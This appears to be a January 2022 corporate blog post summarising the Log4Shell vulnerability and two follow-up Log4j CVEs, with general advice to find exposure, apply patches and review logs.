Insight
Friday, 14 January 2022
Log4Shell is a software vulnerability in Apache Log4j 2, a popular Java library for logging application error messages. If a device running specific versions of Log4j 2 is vulnerable, a remote attacker can take control of it over the internet, according to CVE-2021-44228.
Text messages can be used to exploit the vulnerability and remotely control a computer. By injecting malicious code into most available input surfaces, Log4Shell allows an attacker to take control of the Log4j server. The logger records all server activity, and once the malicious code is replicated, the server is infected.
1. CVE-2021-45105
CVE-2021-45105 is the name of the third zero-day vulnerability identified in Apache Log4j. The CVSS score for this vulnerability is 7.5 out of 10. An attacker with input control (e.g., via the Thread Context Map) might build a malicious lookup variable that causes an infinite recursive lookup, causing a process crash and DoS (Denial of Service).
This vulnerability creates an indefinite loop on self-referential lookups, allowing attackers with access over the MDC input data to launch a DoS (Denial of Service) attack. Although this vulnerability is in the same library as Log4Shell, it is not a variation because it can also exploit non-JNDI lookups.
2. CVE-2021-45046
This 3.7-rated vulnerability affects all versions of Log4j between 2.0-beta9 through 2.12.1, as well as 2.13.0 and 2.15.0. According to Apache, the update for Log4Shell was insufficient in some non-default setups, allowing an attacker to create malicious input data using JNDI Lookup, resulting in a denial of service (DoS) or worse.
Because this vulnerability allows attacks using the Thread Context Map (MDC) input data when the setup employs a non-default Pattern Layout, attackers may be able to construct malicious input data that results in data leaks or remote code execution. It uses either Context Lookup pattern (e.g., "$${ctx:loginId}") or Thread Context Map pattern (e.g., “%X”, “%mdc” or “%MDC”).
Practices that apply to the development, deployment, delivery, and support of certain services in an organization. It includes business analysis, service design and desk, availability management, and so on.
Text messages can be used to exploit the vulnerability and remotely control a computer. The logger records all server activity, and once the malicious code is replicated, the server is infected. If this happens to your company, it can be very harmful. So, how can organizations avoid Log4Shell? These 2 steps can be worth to try to avoid Log4Shell!
Technical Management Practices
1. Identify the exposure to Log4Shell
Identifying Log4Shell exposure and addressing vulnerabilities should be the top priority for every security team. This means that you must scan the entire IT state for any Java code, regardless of whether your organization uses Windows, Linux, or Mac servers. Then, see if it makes use of the Log4j library. If that is the case, then you must update Log4j to the newest version patch wherever you find it.
2. Apply vendor patches
Organizations must also keep an eye out for vendor patches and apply them as quickly as feasible. However, because there are so many potential attack vectors for this exploit and patching will take so long, it is also critical to have solutions in place to mitigate any emergent threats from the Log4j exploit.
To sum up, organizations should always review their logs for suspicious activities. However, the exploitation string will be logged by a platform, whether it is running a vulnerable version of Log4j or not. Ensuring that the IT team has sufficient knowledge of Log4Shell vulnerabilities and all installations of Log4j are updated to the latest version remains the most critical steps in ensuring organizational security.
Organizations must act quickly to defend their systems since Log4Shell is impactful and trivial to hack. Learn more about the Log4Shell vulnerability and Cybersecurity at Multimatics!
Reference:
A. (2021, December 21). CVE-2021-44228 vulnerability in Apache Log4j library. Securelist. https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
Gorelik, M. (2021, December 17). Protecting Against the Log4j (Log4Shell) Vulnerability. Morphisec. https://blog.morphisec.com/protection-against-log4j-vulnerability-what-actions-to-take
Palazolo, G. (2021, December 20). CVE-2021-45105: New DoS Vulnerability Found in Apache Log4j. Netskope. https://www.netskope.com/blog/cve-2021-45105-new-dos-vulnerability-found-in-apache-log4j
Palazolo, G. (2021, December 20). CVE-2021-45105: New DoS Vulnerability Found in Apache Log4j. Netskope. https://www.netskope.com/blog/cve-2021-45105-new-dos-vulnerability-found-in-apache-log4j